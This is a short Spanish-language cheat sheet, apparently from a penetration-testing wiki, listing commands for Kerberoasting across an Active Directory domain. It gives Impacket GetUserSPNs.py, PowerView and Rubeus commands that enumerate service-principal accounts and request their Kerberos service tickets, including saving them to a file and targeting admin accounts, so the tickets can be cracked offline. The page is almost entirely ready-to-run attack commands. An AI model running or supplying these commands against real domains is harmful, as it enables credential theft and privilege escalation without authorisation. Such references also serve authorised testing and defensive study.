Kerberoast
Linux/Unix
Impacket
Obtener cuentas Service Principal Names (SPN) del dominio objetivo.
GetUserSPNs.py -target-domain <TARGET.ACME.LOCAL> <ACME.LOCAL>/<user>Obtener Ticket Granting Service (TGS) del dominio objetivo.
GetUserSPNs.py -target-domain <TARGET.ACME.LOCAL> <ACME.LOCAL>/<user> -request
GetUserSPNs.py -target-domain <TARGET.ACME.LOCAL> <ACME.LOCAL>/<user> -request -outputfile tgs.txtObtener Ticket Granting Service (TGS) de una cuenta en el dominio objetivo.
GetUserSPNs.py -target-domain <TARGET.ACME.LOCAL> <ACME.LOCAL>/<user> -request-user <user-SPN>
GetUserSPNs.py -target-domain <TARGET.ACME.LOCAL> <ACME.LOCAL>/<user> -request-user <user-SPN> -outputfile tgWindows
PowerView
Obtener cuentas Service Principal Names (SPN) del dominio objetivo.
Get-DomainUser -SPN -Domain <ACME.LOCAL> | select SamAccountNameEnumeración de grupos a los cuales pertence la cuenta Service Principal Names (SPN) en el dominio objetivo.
Get-DomainUser -Domain <ACME.LOCAL> -Identity <user-SPN> | select SamAccountName, MemberOfRubeus
Obtener estadísticas de usuarios del dominio objetivo.
.\Rubeus.exe kerberoast /domain:<ACME.LOCAL> /statsObtener Ticket Granting Service (TGS) del dominio objetivo.
.\Rubeus.exe kerberoast /domain:<ACME.LOCAL> /nowrap
.\Rubeus.exe kerberoast /domain:<ACME.LOCAL> /ldapfilter:'admincount=1' /nowrapObtener Ticket Granting Service (TGS) de una cuenta en el dominio objetivo.
.\Rubeus.exe kerberoast /domain:<ACME.LOCAL> /user:<user> /nowrapÚltima actualización
¿Te fue útil?